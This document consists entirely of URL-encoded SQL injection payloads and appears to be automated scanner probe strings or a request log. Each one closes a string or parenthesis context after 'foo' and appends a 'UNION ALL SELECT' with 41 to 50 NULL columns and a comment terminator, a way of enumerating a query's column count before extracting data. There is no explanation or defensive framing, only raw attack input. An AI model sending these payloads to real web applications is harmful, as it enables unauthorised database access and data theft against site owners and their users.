foo%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 